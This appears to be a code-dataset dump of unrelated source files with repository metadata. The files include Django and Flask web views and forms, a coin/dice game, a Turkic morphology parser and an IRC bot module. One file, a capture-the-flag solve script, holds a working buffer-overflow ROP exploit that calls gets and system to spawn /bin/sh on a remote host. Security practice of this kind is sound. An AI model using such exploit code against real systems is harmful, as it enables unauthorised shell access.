seq_id
stringlengths 7
11
| text
stringlengths 156
1.7M
| repo_name
stringlengths 7
125
| sub_path
stringlengths 4
132
| file_name
stringlengths 4
77
| file_ext
stringclasses 6
values | file_size_in_byte
int64 156
1.7M
| program_lang
stringclasses 1
value | lang
stringclasses 38
values | doc_type
stringclasses 1
value | stars
int64 0
24.2k
⌀ | dataset
stringclasses 1
value | pt
stringclasses 1
value |
---|---|---|---|---|---|---|---|---|---|---|---|---|
20494000483
|
import random
class CaraCoroa:
    """Simulates a coin flip ('Cara' = heads, 'Coroa' = tails)."""

    def __init__(self):
        # Face last shown; a fresh coin reads 'Cara' before any flip.
        self.lado = 'Cara'

    def lancar(self):
        """Flip the coin, store the face in self.lado and return it.

        Returns 'CARA' or 'COROA' (uppercased, as the original did via
        .upper() on the literals).
        """
        # randint(0, 1) is already 0 or 1 — the original's extra
        # `% 2 == 0` test was redundant.
        self.lado = 'CARA' if random.randint(0, 1) == 0 else 'COROA'
        return self.lado
class Dado:
    """A standard six-sided die."""

    def __init__(self):
        # Face currently showing; a fresh die shows 1.
        self.lado = 1

    def lancar(self):
        """Roll the die; returns an int between 1 and 6 inclusive.

        Note: the roll does not update self.lado (matches the original).
        """
        return random.randint(1, 6)
if __name__ == '__main__':
    # Simple text menu: 0 exits the loop, 1 flips the coin, 2 rolls the
    # die; any other number falls through to the farewell message (and,
    # like the original, only 0 actually ends the loop).
    moeda, dado = CaraCoroa(), Dado()
    op = 1
    while op:
        print()
        op = int(input('0. Sair\n1. Lançar Moeda\n2. Lançar Dado\nOpção: '))
        if op == 1:
            print(moeda.lancar())
        elif op == 2:
            print(dado.lancar())
        else:
            print('Saindo do jogo...')
|
Adriano1976/Curso-de-Python
|
Secao04-Introducao-a-POO/Aula097-Classes/Jogo - Cara Coroa e Dados.py
|
Jogo - Cara Coroa e Dados.py
|
py
| 776 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
25208341216
|
#!/usr/bin/python3
from pwn import *
context.arch = 'amd64'  # pwntools: target is x86-64
PATH = 'src/chall'      # local copy of the challenge binary
HOST = '54.179.233.189'
PORT = 8001
# Candidate gdb enhancement scripts, selected by index in debug().
GDBSOURCE = ['~/peda/peda.py', '~/pwndbg/gdbinit.py']
# Ubuntu release -> [debug-symbol directory, matching libc build].
LIBC_DBG = {
    '16.04' : ['~/debug/ubuntu-16.04/dbg64/', '~/debug/ubuntu-16.04/dbg64/libc-2.23.so'],
    '18.04' : ['~/debug/ubuntu-18.04/dbg64/', '~/debug/ubuntu-18.04/dbg64/libc-2.27.so'],
    '20.04' : ['~/debug/ubuntu-20.04/dbg64/', '~/debug/ubuntu-20.04/dbg64/libc-2.31.so'],
    '20.10' : ['~/debug/ubuntu-20.10/dbg64/', '~/debug/ubuntu-20.10/dbg64/libc-2.32.so'],
}
# Commands fed to gdb on attach: break near the end of main and stay on
# the parent process after any fork.
GDBSCRIPT = '''
b *main+246
set follow-fork-mode parent
'''
def debug(gdbscript, gdbsrc = 0, libc = None):
    """Attach gdb to the global tube `r` with helper scripts preloaded.

    gdbscript -- extra gdb commands appended after the setup scripts
    gdbsrc    -- index into GDBSOURCE (0 = peda, 1 = pwndbg)
    libc      -- key into LIBC_DBG to load matching libc debug symbols,
                 or None to skip symbol loading
    Silently does nothing when `r` is a remote connection (gdb can only
    attach to a local process).
    """
    if type(r) == process:
        scripts = [
            f'source ~/debug/loadsym.py',
            f'source ~/gdb_sigwait/src/sighandler.gdb',
            f'source {GDBSOURCE[gdbsrc]}',
        ]
        if libc != None:
            scripts += [
                f'set debug-file-directory {LIBC_DBG[libc][0]}',
                f'loadsym {LIBC_DBG[libc][1]}'
            ]
        gdb.attach(r, '\n'.join(scripts) + gdbscript)
def exploit(r):
    """Stack-overflow ROP chain: gets() writes "/bin/sh" into .bss, then
    system() runs it.

    r -- pwntools tube (local process or remote connection)
    """
    pop_rdi_ret = 0x0000000000401383  # `pop rdi; ret` gadget in the binary
    payload = b'A' * 0x48             # pad up to the saved return address
    payload += p64(0xdeadbeef) * 2    # filler for two saved slots
    payload += p64(pop_rdi_ret)
    payload += p64(elf.bss(0x100))    # rdi = writable .bss scratch buffer
    payload += p64(pop_rdi_ret+1)     # lone `ret` keeps the stack 16-byte aligned
    payload += p64(elf.sym.gets)      # gets(bss): reads the second line we send
    payload += p64(pop_rdi_ret)
    payload += p64(elf.bss(0x100))
    payload += p64(pop_rdi_ret+1)
    payload += p64(elf.sym.system)    # system(bss) -> system("/bin/sh")
    # debug(GDBSCRIPT, gdbsrc = 0, libc = None)
    r.sendlineafter(b"> ", payload)
    pause()
    r.sendline(b"/bin/sh")            # consumed by the gets() in the chain
    r.interactive()
if __name__ == '__main__':
    # Load the target binary; passing REMOTE on the command line switches
    # between the live service and a local ASLR-disabled process.
    elf = ELF(PATH, checksec = True)
    # libc = ELF(elf.libc.path, checksec = False)
    if args.REMOTE:
        r = remote(HOST, PORT)
    else:
        r = elf.process(aslr = 0, env = {})
    exploit(r)
|
bl33dz/ForestyCTF
|
Binary Exploitation/bof/solve.py
|
solve.py
|
py
| 1,854 |
python
|
en
|
code
| 1 |
github-code
|
6
|
20181255699
|
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 5 12:37:51 2017
@author: vital
"""
import pickle
import networkx as nx
import codecs
import re
from morph import dictionaries as dic
from morph import lemmas_dict as lem
from config import basedir
from app import models, db
# Morphological transition graph for Old Turkic, unpickled from a DB blob.
# NOTE(review): pickle.loads on stored data is only safe if the database
# contents are fully trusted — confirm.
G = pickle.loads(models.Graph.query.filter_by(lang='oldturkic').first().graph)
def get_lem(word):
    """Return {lemma: pos} candidates for *word*.

    An exact dictionary hit wins outright; otherwise every lemma that is
    a prefix of *word* (and whose POS may inflect) is a candidate.
    """
    lemmas = lem.lemmas_dict
    if word in lemmas:
        return {word: lemmas[word]}
    return {
        candidate: pos
        for candidate, pos in lemmas.items()
        if candidate == word[:len(candidate)] and pos not in dic.non_inflected
    }
def last_possible_aff(word):
    """Collect every (affix, tag) in the graph matching the end of *word*.

    Each hit becomes a one-element chain [((aff, tag), remainder)], where
    remainder is *word* with the affix stripped from the right.
    """
    chains = []
    for node in G.nodes():
        for aff, tag in G.node[node]:
            if aff == word[-len(aff):]:
                chains.append([((aff, tag), word[:-len(aff)])])
    return chains
def get_next_aff(affix, chain):
    """Find affixes allowed to follow *affix* that match *chain*'s tail.

    Returns a list of (next_affix, shorter_chain) pairs, where
    shorter_chain is *chain* with the matched affix stripped.
    """
    found = []
    for node in G.nodes():
        if affix not in G.node[node]:
            continue
        for successor in G.successors(node):
            for candidate in G.node[successor]:
                if candidate[0] == chain[-len(candidate[0]):]:
                    found.append((candidate, chain[:-len(candidate[0])]))
    return found
def one_step(lst):
    """Extend parse chain *lst* by one affix in every possible way.

    Returns a (possibly empty) list of new chains; *lst* is not mutated.
    """
    tail_aff, tail_chain = lst[-1]
    return [lst + [extension]
            for extension in get_next_aff(tail_aff, tail_chain)]
def check_for_lemma(list_of_possible_pars):
    """Return the parse if its remaining chain is a known lemma, else None."""
    pars = list_of_possible_pars
    return pars if pars[-1][1] in lem.lemmas_dict else None
def check_list_for_pars(lst):
    """Return True if at least one chain in *lst* can still be extended.

    lst -- list of parse chains (as built by last_possible_aff/one_step)
    """
    # any() short-circuits on the first extendable chain; the original
    # built a boolean list for every chain before checking it.
    return any(one_step(chain) for chain in lst)
def predict_pos(first_aff):
    """Guess part-of-speech tags for a stem given its innermost affix.

    Scans graph nodes containing *first_aff* and collects every known POS
    among their successors; returns the candidates joined with '/'.
    """
    candidates = []
    for node in G.nodes():
        if first_aff not in G.node[node]:
            continue
        candidates.extend(p for p in dic.pos if p in G.successors(node))
    return '/'.join(candidates)
def reverse_pars(pars, word):
    """Turn a suffix-first affix chain *pars* into lemma-first order.

    Pops the innermost entry from *pars* (mutating it, as the original
    did), resolves the lemma's POS from the dictionary when known or from
    predict_pos otherwise, and returns [lemma, first_affix, outer affixes...].
    """
    candidates = get_lem(word)
    first_aff, stem = pars.pop()
    if stem in candidates:
        lemma = (stem, candidates[stem])
    else:
        lemma = (stem, predict_pos(first_aff))
    return [lemma, first_aff, *(morph[0] for morph in reversed(pars))]
def filter_pars(parses):
    """Order *parses* by the length of their leading element's first item,
    following a fixed priority (5 first, then 4, 6, 3, then 7..18).

    Parses whose length is not in the priority list are dropped.
    """
    priority = [5, 4, 6, 3, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18]
    ordered = []
    for wanted in priority:
        ordered.extend(p for p in parses if len(p[0][0]) == wanted)
    return ordered
def parsing(word):
    """Iteratively extend affix chains for *word* until none can grow.

    Starts from every affix matching the end of *word*; while any chain
    can still be extended, extendable chains are replaced by their
    extensions and finished chains are carried over unchanged. Returns
    the final list of chains.
    """
    chains = last_possible_aff(word)
    while check_list_for_pars(chains):
        next_chains = []
        for chain in chains:
            # Compute the extensions once; the original called one_step()
            # twice per chain per round.
            extensions = one_step(chain)
            if extensions:
                next_chains.extend(extensions)
            else:
                next_chains.append(chain)
        chains = next_chains
    return chains
def pars_analyse(w):
    """Produce all morphological parses of word *w*.

    Returns a list of parses; each parse is a list starting with a
    (lemma, pos) pair followed by (affix, tag) pairs in lemma-first order,
    ordered by preferred affix length and deduplicated.
    """
    possible_lemmas = get_lem(w)
    result = []
    if possible_lemmas != {}:
        # The word itself is a dictionary lemma: one trivial parse.
        if w in possible_lemmas:
            return [[(w, possible_lemmas[w])]]
        else:
            # Try each candidate lemma and parse the remaining tail.
            for l in possible_lemmas:
                chain = w[len(l):]
                possible_parses = parsing(chain)
                # Keep only parses that consumed the whole tail.
                parses = [pars for pars in possible_parses if pars[len(pars)-1][1] == '']
                for p in parses:
                    tmp = []
                    # Accept only if the lemma's POS is compatible with the
                    # POS predicted from the innermost affix.
                    if possible_lemmas[l] in predict_pos(p[len(p)-1][0]):
                        for morph in p:
                            tmp.append(morph[0])
                        tmp.append((l, possible_lemmas[l]))
                        tmp.reverse()
                        result.append(tmp)
    if result == []:
        # No dictionary lemma worked: parse the whole word and guess the
        # lemma's POS from its first (innermost) affix.
        possible_parses = parsing(w)
        for pars in possible_parses:
            tmp = []
            lemma_aff = pars.pop()
            first_aff = lemma_aff[0]
            lemma = (lemma_aff[1], predict_pos(first_aff))
            if pars == []:
                tmp.append(lemma)
                tmp.append(first_aff)
                result.append(tmp)
            else:
                for morph in pars:
                    tmp.append(morph[0])
                tmp.append(first_aff)
                tmp.append(lemma)
                tmp.reverse()
                result.append(tmp)
    # Order by preferred affix length, then drop duplicates keeping the
    # first occurrence.
    result = filter_pars(result)
    result = [e for i,e in enumerate(result) if e not in result[:i]]
    return result
def tag_interpretation(pars, lang):
    """Render a parse as a human-readable gloss string in language *lang*.

    pars -- sequence of (morpheme, tag) pairs; a tag may contain
            ','-separated parts and '/'-separated alternatives
    lang -- key into the dic.interpretation[tag] gloss tables

    Glosses are joined with ' + '; alternative readings with ' / '.
    The trailing separator is stripped from the result.
    """
    result = ""
    for morpheme in pars:
        tag = morpheme[1]
        if ',' in tag:
            for part in tag.split(','):
                if '/' in part:
                    for alt in part.split('/'):
                        result += dic.interpretation[alt][lang] + ' / '
                    result += '+ '
                else:
                    result += dic.interpretation[part][lang] + ' + '
        else:
            alternatives = tag.split('/')
            # BUG FIX: the original `'S' and 'SPRON' and 'ADJ' in ...` only
            # tested membership of 'ADJ' ('S' and 'SPRON' are always-truthy
            # literals); a noun/pronoun/adjective ambiguity is what marks a
            # proper name.
            if {'S', 'SPRON', 'ADJ'} <= set(alternatives):
                tag = 'NAME'
                result += dic.interpretation[tag][lang] + ' + '
            elif '/' in tag:
                # BUG FIX: `tag.spilt('/')` (typo) crashed this branch, and
                # the loop body looked up the whole tag instead of each
                # alternative.
                for alt in alternatives:
                    result += dic.interpretation[alt][lang] + ' / '
                result += '+ '
            else:
                result += dic.interpretation[tag][lang] + ' + '
    # Drop the trailing ' + ' / ' / ' separator.
    return result[0:len(result)-3]
|
vetka925/oldturkicmorph-web
|
morph/morph_analysis.py
|
morph_analysis.py
|
py
| 5,750 |
python
|
en
|
code
| 0 |
github-code
|
6
|
14839168624
|
from django.contrib.auth import get_user_model
from django.shortcuts import get_object_or_404, render, redirect
from django.contrib.auth.decorators import login_required
from django.core.paginator import Paginator
from django.conf import settings
from .forms import PostForm, CommentForm
from .models import Post, Group, User, Follow
# Re-bind User to the active user model (overrides the models import above).
User = get_user_model()
def paginator(request, object_list, per_page):
    """Return the page of *object_list* selected by the ``page`` GET param."""
    page_number = request.GET.get('page')
    return Paginator(object_list, per_page).get_page(page_number)
def index(request):
    """Render the main feed with all posts, paginated."""
    posts = Post.objects.select_related('author', 'group')
    context = {
        'posts': posts,
        'page_obj': paginator(request, posts, settings.SORT_POSTS),
    }
    return render(request, 'posts/index.html', context)
def group_posts(request, slug):
    """Render the post list for one group (404 on unknown slug)."""
    group = get_object_or_404(Group, slug=slug)
    posts = group.groups.select_related('author')
    context = {
        'group': group,
        'posts': posts,
        'page_obj': paginator(request, posts, settings.SORT_POSTS),
    }
    return render(request, 'posts/group_list.html', context)
def profile(request, username):
    """Render an author's profile: their posts plus follow status."""
    author = get_object_or_404(User, username=username)
    posts = author.posts.select_related('group')
    # Anonymous visitors never "follow"; for authenticated users this is a
    # truthy/falsy queryset of the Follow relation.
    following = request.user.is_authenticated and Follow.objects.filter(
        user=request.user,
        author=author
    )
    context = {
        'page_obj': paginator(request, posts, settings.SORT_POSTS),
        'count': posts.count(),
        'author': author,
        'following': following,
    }
    return render(request, 'posts/profile.html', context)
def post_detail(request, post_id):
    """Render a single post with its comments and a comment form."""
    post = get_object_or_404(Post, pk=post_id)
    author = post.author
    context = {
        'post': post,
        'post_title': post.text[:30],  # truncated text used as the title
        'author': author,
        'author_posts': author.posts.all().count(),
        'form': CommentForm(request.POST or None),
        'comments': post.comments.select_related('author'),
    }
    return render(request, 'posts/post_detail.html', context)
@login_required
def post_create(request):
    """Create a post for the current user; redirect to their profile."""
    form = PostForm(request.POST or None, files=request.FILES or None)
    if not form.is_valid():
        # GET or invalid POST: (re)render the form.
        return render(request, 'posts/create_post.html', {'form': form})
    post = form.save(commit=False)
    post.author = request.user
    post.save()
    return redirect('posts:profile', request.user)
@login_required
def post_edit(request, post_id):
    """Edit an existing post; only its author may edit.

    Non-authors are redirected back to the post detail page. On a valid
    submit the post is saved and the user is redirected likewise.
    """
    post = get_object_or_404(Post, pk=post_id)
    if post.author != request.user:
        return redirect('posts:post_detail', post_id)
    form = PostForm(
        request.POST or None,
        files=request.FILES or None,
        instance=post
    )
    if form.is_valid():
        # form.save() already persists the instance; the original
        # redundantly called .save() a second time on the result.
        form.save()
        return redirect('posts:post_detail', post_id)
    context = {
        'form': form,
        'is_edit': True,
        'post': post,
    }
    return render(request, 'posts/create_post.html', context)
@login_required
def add_comment(request, post_id):
    """Attach a comment from the current user to post *post_id*."""
    post = get_object_or_404(Post, id=post_id)
    form = CommentForm(request.POST or None)
    if form.is_valid():
        comment = form.save(commit=False)
        comment.author = request.user
        comment.post = post
        comment.save()
    # Invalid comments are silently discarded; always return to the post.
    return redirect('posts:post_detail', post_id=post_id)
@login_required
def follow_index(request):
    """Feed of posts by authors the current user follows."""
    feed = Post.objects.filter(author__following__user=request.user)
    page_obj = paginator(request, feed, settings.SORT_POSTS)
    return render(request, 'posts/follow.html', {'page_obj': page_obj})
@login_required
def profile_follow(request, username):
    """Start following *username*; self-follow is a silent no-op."""
    author = get_object_or_404(User, username=username)
    if request.user != author:
        Follow.objects.get_or_create(user=request.user, author=author)
    return redirect('posts:profile', username)
@login_required
def profile_unfollow(request, username):
    """Stop following *username* (no error when not currently following)."""
    author = get_object_or_404(User, username=username)
    Follow.objects.filter(user=request.user, author=author).delete()
    return redirect('posts:profile', username)
|
Medbrat4669/yatube_project
|
yatube/posts/views.py
|
views.py
|
py
| 4,552 |
python
|
en
|
code
| 0 |
github-code
|
6
|
36802074369
|
#! /usr/bin/python3
import sqlite3
import pandas as pd
pd.set_option('display.max_columns', 500)
path = '/home/mayijun/CITI2017/'
# Calculate station days
conn = sqlite3.connect(path + 'CITI2017.sqlite3')
sql = """SELECT DISTINCT startstationid AS stationid,startdate AS date FROM trip WHERE startweekday NOT IN ('Saturday','Sunday')"""
start = pd.read_sql(sql, conn)
sql = """SELECT DISTINCT endstationid AS stationid,enddate AS date FROM trip WHERE endweekday NOT IN ('Saturday','Sunday')"""
end = pd.read_sql(sql, conn)
wkday = pd.concat([start, end])
wkday = wkday.drop_duplicates()
wkday = wkday.groupby(['stationid'], as_index=False)['date'].count()
wkday.columns = ['stationid', 'weekdays']
sql = """SELECT DISTINCT startstationid AS stationid,startdate AS date FROM trip WHERE startweekday IN ('Saturday','Sunday')"""
start = pd.read_sql(sql, conn)
sql = """SELECT DISTINCT endstationid AS stationid,enddate AS date FROM trip WHERE endweekday IN ('Saturday','Sunday')"""
end = pd.read_sql(sql, conn)
wkend = pd.concat([start, end])
wkend = wkend.drop_duplicates()
wkend = wkend.groupby(['stationid'], as_index=False)['date'].count()
wkend.columns = ['stationid', 'weekends']
df = pd.merge(wkday, wkend, how='outer', on='stationid')
df.to_csv(path + 'stationdays.csv', index=False, na_rep=0)
conn.close()
# Merge the station list with the per-station day counts computed above
# and write the combined table back into the SQLite database.
conn = sqlite3.connect(path + 'CITI2017.sqlite3')
station = pd.read_csv(path + 'station.csv')
wkd = pd.read_csv(path + 'stationdays.csv')
station=station[['stationid','stationname','stationlat','stationlong']]
df = pd.merge(station, wkd, how='outer', on='stationid').sort_values('stationid')
df.to_sql('station', conn, if_exists='replace', index=False)
conn.close()
|
NYCPlanning/td-citibike
|
2017/stationdays.py
|
stationdays.py
|
py
| 1,726 |
python
|
en
|
code
| 1 |
github-code
|
6
|
29969194613
|
from src import EventManager, ModuleManager, utils
# Message tags that mark the sender as a bot (vendored and draft names).
TAGS = {
    utils.irc.MessageTag(None, "inspircd.org/bot"),
    utils.irc.MessageTag(None, "draft/bot")
}
class Module(ModuleManager.BaseModule):
    """Set our bot usermode on connect and ignore messages from other bots."""
    @utils.hook("received.376")
    @utils.hook("received.422")
    def botmode(self, event):
        # End of MOTD (376) or no MOTD (422): if the server advertises a
        # BOT usermode in ISUPPORT, flag ourselves with it.
        if "BOT" in event["server"].isupport:
            botmode = event["server"].isupport["BOT"]
            event["server"].send_raw("MODE %s +%s" % (event["server"].nickname, botmode))
    @utils.hook("received.message.private")
    @utils.hook("received.message.channel")
    @utils.kwarg("priority", EventManager.PRIORITY_HIGH)
    def message(self, event):
        # High priority so we eat bot-tagged messages before other handlers
        # get to see them.
        for tag in TAGS:
            if tag.present(event["tags"]):
                event.eat()
|
xfnw/bitbot
|
modules/ircv3_botignore.py
|
ircv3_botignore.py
|
py
| 756 |
python
|
en
|
code
| null |
github-code
|
6
|
12960752319
|
import warnings
warnings.filterwarnings('ignore')
from popsycle import synthetic
import numpy as np
import matplotlib.pyplot as plt
from astropy.table import Table
import h5py
def test_h5_output(ebf_file, reference_h5_file, extra_col= False):
    """Compare a freshly generated PopSyCLE h5 file against a reference.

    Parameters
    ----------
    ebf_file : str
        Name of the ebf file used to generate the reference h5 file
    reference_h5_file : str
        File to compare new output to (should have been produced with
        seed=42 on the same ebf_file)
    extra_col : bool, default False
        Whether the new h5 file is expected to carry additional columns
        (i.e. the new version of popsycle emits more information)
    """
    # Create the new h5 file (test.h5) with a fixed seed so the output is
    # reproducible.
    synthetic.perform_pop_syn(ebf_file = ebf_file,
                              output_root = 'test',
                              iso_dir = '/u/casey/scratch/work/microlens/popsycle_test/isochrones/',
                              bin_edges_number = None, overwrite = True, seed=42);
    # Read and concatenate the four (l, b) patches from the reference file.
    hfr = h5py.File(reference_h5_file, 'r')
    ref_dset = np.concatenate((hfr['l0b0'], hfr['l0b1'], hfr['l1b0'], hfr['l1b1']),
                              axis=1)
    hfr.close()
    # Same for the file popsycle just produced.
    hft = h5py.File('test.h5', 'r')
    test_dset = np.concatenate((hft['l0b0'], hft['l0b1'], hft['l1b0'], hft['l1b1']),
                               axis=1)
    hft.close()
    # Row-count sanity check (axis 0 holds the catalog columns).
    if test_dset.shape[0] != ref_dset.shape[0]:
        if not extra_col:
            print("the h5 files are not the same size. Run again with extra_col=True if you have added columns")
    # Element-wise comparison, column by column.
    matched_col = 0
    for i in range(ref_dset.shape[0]):
        test_col = test_dset[i, :]
        ref_col = ref_dset[i, :]
        # BUG FIX: the original compared `test_col.all() == ref_col.all()`
        # (one aggregate boolean per side, not element-wise) and located
        # NaNs with `np.where(col == np.nan)`, which is always empty
        # because NaN != NaN (and then called .all() on np.where's tuple,
        # an AttributeError). array_equal(..., equal_nan=True) performs
        # the intended comparison and treats co-located NaNs as equal.
        if np.array_equal(test_col, ref_col, equal_nan=True):
            matched_col += 1
        else:
            print('Test failed in column', i)
    if matched_col == ref_dset.shape[0]:
        print("The new test h5 file matched the reference file!")
    else:
        print("The new test h5 file does not match the reference file")
    return
# --- Ad-hoc end-to-end run: generate events from test.h5 and compare the
# results against the trial_1 reference outputs. ---
synthetic.calc_events(hdf5_file = 'test.h5',
                      output_root2 = 'test',
                      radius_cut = 2,
                      obs_time = 1000,
                      n_obs = 11,
                      theta_frac = 2,
                      blend_rad = 0.65,
                      overwrite = True,
                      n_proc = 1)
synthetic.refine_events(input_root = 'test',
                        filter_name = 'I',
                        photometric_system = 'ubv',
                        red_law = 'Damineli16',
                        overwrite = True,
                        output_file = 'default')
# Inspect the reference (trial_1) h5 file.
hfr = h5py.File('trial_1.h5', 'r')
print((list(hfr.keys())))
dsetr = hfr['l0b0']
print(dsetr)
hfr.close()
# Inspect the freshly generated file and resize before comparing.
# NOTE(review): dsetr is used below after hfr.close() — h5py datasets are
# invalid once their file is closed, so this comparison likely fails;
# confirm intent.
hft = h5py.File('test.h5', 'r+')
print(list(hft.keys()))
dsett = hft['l0b0']
print(dsett)
dsett.resize((27, 176660))
print(dsett)
print('test==trial', dsetr == dsett)
hft.close()
# Compare the refined-event tables, ignoring columns added by newer
# versions of the code.
tabr = Table.read('trial_1_refined_events_i_Damineli16.fits')
tabt = Table.read('test_refined_events_i_Damineli16.fits')
print('The col names of the trial 1 fits are:', tabr.colnames)
print('The col names of the test fits are:', tabt.colnames)
tabt.remove_columns(['teff_S', 'grav_S', 'lum_S', 'teff_L', 'grav_L', 'lum_L'])
print('Check if tables differ:', tabr == tabt)
|
jluastro/PopSyCLE
|
popsycle/tests/output_test_synthetic.py
|
output_test_synthetic.py
|
py
| 4,102 |
python
|
en
|
code
| 13 |
github-code
|
6
|
25993094849
|
from datetime import datetime
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, TextAreaField, SelectField, FloatField
from wtforms.validators import DataRequired, Length, Regexp
class NewOrderForm(FlaskForm):
    """Form for creating or editing a repair order."""
    description = TextAreaField("Опис: ",
                                validators=[DataRequired(),
                                            Length(max=1000)])
    client = StringField('Клієнт',
                         id='client_autocomplete',
                         validators=[DataRequired(),
                                     Length(max=200)])
    created_at = StringField("Дата створення",
                             validators=[DataRequired(),
                                         Regexp(
                                             r'^(0[1-9]|[12][0-9]|3[01])[\.](0[1-9]|1[012])[\.]((19|20)\d\d|\d\d)$')],
                             # BUG FIX: a bare strftime() call here was
                             # evaluated once at import time, freezing the
                             # default date for the process lifetime; a
                             # callable default is re-evaluated per form
                             # instance (supported by WTForms).
                             default=lambda: datetime.now().strftime("%d.%m.%Y"))
    serial = StringField("Серійний номер",
                         id='serial_autocomplete',
                         validators=[Length(max=200)])
    price = FloatField("Ціна", validators=[DataRequired()])
    staff = SelectField("Виконавець")
    type = SelectField("Тип замовлення")
    submit = SubmitField("Зберегти")
    def __init__(self, order=None, staff_choices=None, type_choices=None, *args, **kwargs):
        """Optionally prefill from an existing *order* and set the choices
        of the staff/type selects."""
        super().__init__(*args, **kwargs)
        if order:
            self.description.data = order.description
            self.client.data = order.client
            self.created_at.data = order.created_at.strftime("%d.%m.%Y")
            self.serial.data = order.device.serial
            self.price.data = order.price
            self.staff.data = order.staff.name
            self.type.data = order.type.name
        if staff_choices:
            self.staff.choices = staff_choices
        if type_choices:
            self.type.choices = type_choices
class NewClientForm(FlaskForm):
    """Form for creating or editing a client (person or company)."""
    name = StringField("Ім'я фізичної або юридичної особи",
                       validators=[DataRequired(),
                                   Length(max=200)])
    # validators = [Regexp(r'^(\+\d{1,2}\s?)?((\(?\d{3}\)?)[\s]?\d{3}[\s]?\d{4}|(\(?\d{3,4}\)?)[\s]?\d{3}[\s]?\d{3})$')]
    phone = StringField("Номер телефону",
                        validators=[DataRequired(),
                                    Length(max=80)])
    address = StringField("Адреса",
                          validators=[Length(max=200)])
    notes = TextAreaField("Примітки",
                          validators=[Length(max=1000)])
    submit = SubmitField("Зберегти")
    def __init__(self, client=None, *args, **kwargs):
        """Prefill the fields from an existing *client* when given."""
        super().__init__(*args, **kwargs)
        if client:
            self.name.data = client.name
            self.phone.data = client.phone
            self.address.data = client.address
            self.notes.data = client.notes
class NewDeviceForm(FlaskForm):
    """Form for creating or editing a device."""
    name = StringField("Назва")
    serial = StringField("Серійний номер", validators=[DataRequired()])
    submit = SubmitField("Зберегти")
    def __init__(self, device=None, *args, **kwargs):
        """Prefill the fields from an existing *device* when given."""
        super().__init__(*args, **kwargs)
        if device:
            self.name.data = device.name
            self.serial.data = device.serial
class NewStaffForm(FlaskForm):
    """Form for creating a staff member."""
    name = StringField("Ім'я")
    submit = SubmitField("Зберегти")
class DeleteConfirmForm(FlaskForm):
    """Single-button confirmation form for deletions."""
    delete = SubmitField("Так, видалити")
class NavigationForm(FlaskForm):
    """Search / filter / sort controls for the orders list."""
    search_field = StringField("Введіть пошуковий запит")
    status_field = SelectField('Статус')
    type_field = SelectField('Тип')
    # Sort options: by date (new/old first), by client, or by status.
    sort_by_field = SelectField('Сортувати за', choices=[('new_first', 'Датою (нові спочатку)'),
                                                         ('old_first', 'Датою (старі спочатку)'),
                                                         ('client', 'Клієнтом'),
                                                         ('status', 'Статусом')])
    def __init__(self, status_choices=None, type_choices=None, *args, **kwargs):
        """Populate the status/type selects with caller-provided choices."""
        super().__init__(*args, **kwargs)
        if status_choices:
            self.status_field.choices = status_choices
        if type_choices:
            self.type_field.choices = type_choices
|
1Lorde/orders-tracker
|
orders_tracker/forms.py
|
forms.py
|
py
| 4,563 |
python
|
en
|
code
| 0 |
github-code
|
6
|
16760366561
|
from django.shortcuts import render,redirect,get_object_or_404
# CSRF
from django.views.decorators.csrf import csrf_exempt
from django.utils.http import urlsafe_base64_encode,urlsafe_base64_decode
from django.utils.encoding import force_bytes
from django.core.mail import EmailMessage
from django.utils.encoding import force_bytes, force_text
from django.core.mail import BadHeaderError, send_mail
from django.http import HttpResponse, HttpResponseRedirect
from django.contrib.sites.shortcuts import get_current_site
from django.template.loader import render_to_string
from django.utils.http import urlsafe_base64_encode,urlsafe_base64_decode
from django.utils.encoding import force_bytes
from django.core.mail import EmailMessage
from django.utils.encoding import force_bytes, force_text
from django.contrib import messages
import pdb
def home(request):
    """Render the landing (index) page."""
    return render(request, 'index.html')
# def contact(request):
# return render(request, 'contact.html')
@csrf_exempt
def sendemail(request):
    """Forward a user enquiry to the site mailbox via plain send_mail."""
    username = request.POST.get('username')
    subject = "돌직구 사용자"+ username+ "님이 보내신 문의 메일입니다."
    message = request.POST.get('message')
    useremail = request.POST.get("useremail")
    # Guard clause: all three pieces must be present.
    if not (subject and message and useremail):
        return HttpResponse("정확하게 입력해주세요.")
    try:
        send_mail(subject, message, useremail, ["[email protected]"])
    except BadHeaderError:
        return HttpResponse('Invalid header found.')
    return redirect('home')
@csrf_exempt
def contact(request):
    """Contact page: GET renders the form, POST emails the enquiry.

    On POST, renders the enquiry into an HTML email, sends it to the site
    mailbox, flashes a success/failure message and redirects back here.
    """
    if request.method == "POST":
        username = request.POST["username"]
        subject = "돌직구 사용자"+ username+ "님이 보내신 문의 메일입니다."
        message = request.POST["message"]
        useremail = request.POST["useremail"]
        emailContent = render_to_string('email.html', {
            "subject": subject,
            "useremail": useremail,
            "message":message,
        })
        emailAddress = "[email protected]"
        emailObject = EmailMessage(subject, emailContent, to=[emailAddress])
        emailObject.content_subtype = "html"
        result = emailObject.send()  # number of messages successfully sent
        if result == 1:
            messages.info(request, "성공적으로 문의가 돌직구에 전달되었습니다.")
        else:
            # BUG FIX: `messgaes` (typo) raised NameError on the failure path.
            messages.info(request, "문의에 실패하였습니다.")
        return redirect('contact')
    else:
        return render(request, 'contact.html')
|
suna-ji/RockJiggu
|
RockJiggu/views.py
|
views.py
|
py
| 2,535 |
python
|
en
|
code
| 0 |
github-code
|
6
|
13956703300
|
from django.core import checks, exceptions
from django.db.models import Field
from django.utils.translation import gettext_lazy as _, ngettext_lazy

from . import forms
from . import validators
from .ipv6cidr import clean_ipv6_cidr
class GenericIPNetworkField(Field):
    """
    Model field that accepts CIDR network input.
    ipv4 0.0.0.0/0
    ipv6 ::::/0
    """
    empty_strings_allowed = False
    description = _("GenericIPNetworkField")
    default_error_messages = {}

    def __init__(self, verbose_name=None, name=None, protocol='both',
                 *args, **kwargs):
        """protocol -- 'both', 'ipv4' or 'ipv6'; selects the validators."""
        self.protocol = protocol
        self.default_validators, invalid_error_message = \
            validators.ip_network_validators(protocol)
        # BUG FIX: the original mutated the class-level
        # default_error_messages dict, so every field instance shared (and
        # overwrote) the same 'invalid' message. Merge it per-instance
        # through the error_messages kwarg, which Field.__init__ layers
        # over the class defaults.
        error_messages = dict(kwargs.pop('error_messages', None) or {})
        error_messages.setdefault('invalid', invalid_error_message)
        kwargs['error_messages'] = error_messages
        kwargs['max_length'] = 43  # ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128
